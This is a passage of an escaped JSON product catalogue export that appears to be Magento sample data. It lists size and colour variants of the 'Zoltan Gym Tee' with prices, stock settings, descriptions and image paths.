ecial_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"487\":{\"sku\":\"MS06-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-M-Green\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"488\":{\"sku\":\"MS06-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-M-Yellow\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"489\":{\"sku\":\"MS06-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-L-Blue\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms06-blue_alt1.jpg,\\/m\\/s\\/ms06-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms06-blue_alt1.jpg,\\/m\\/s\\/ms06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"490\":{\"sku\":\"MS06-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-L-Green\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"491\":{\"sku\":\"MS06-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-L-Yellow\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"492\":{\"sku\":\"MS06-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-XL-Blue\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms06-blue_alt1.jpg,\\/m\\/s\\/ms06-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms06-blue_alt1.jpg,\\/m\\/s\\/ms06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"493\":{\"sku\":\"MS06-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-XL-Green\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"494\":{\"sku\":\"MS06-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee-XL-Yellow\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoltan-gym-tee-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms06-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"495\":{\"sku\":\"MS06\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Zoltan Gym Tee\",\"description\":\"<p>This short-sleeve wonder works twice as hard to give you good gym days and good looks. The Zoltan Gym Tee helps you stay comfortable, while the looser sleeves and flatlock seams keep you moving in chafe-free comfort.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Organic Cotton|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MS06-XS-Blue,size=XS,color=Blue|sku=MS06-XS-Green,size=XS,color=Green|sku=MS06-XS-Yellow,size=XS,color=Yellow|sku=MS06-S-Blue,size=S,color=Blue|sku=MS06-S-Green,size=S,color=Green|sku=MS06-S-Yellow,size=S,color=Yellow|sku=MS06-M-Blue,size=M,color=Blue|sku=MS06-M-Green,size=M,color=Green|sku=MS06-M-Yellow,size=M,color=Yellow|sku=MS06-L-Blue,size=L,color=Blue|sku=MS06-L-Green,size=L,color=Green|sku=MS06-L-Yellow,size=L,color=Yellow|sku=MS06-XL-Blue,size=XL,color=Blue|sku=MS06-XL-Green,size=XL,color=Green|sku=MS06-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms06-blue_alt1.jpg,\\/m\\/s\\/ms06-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\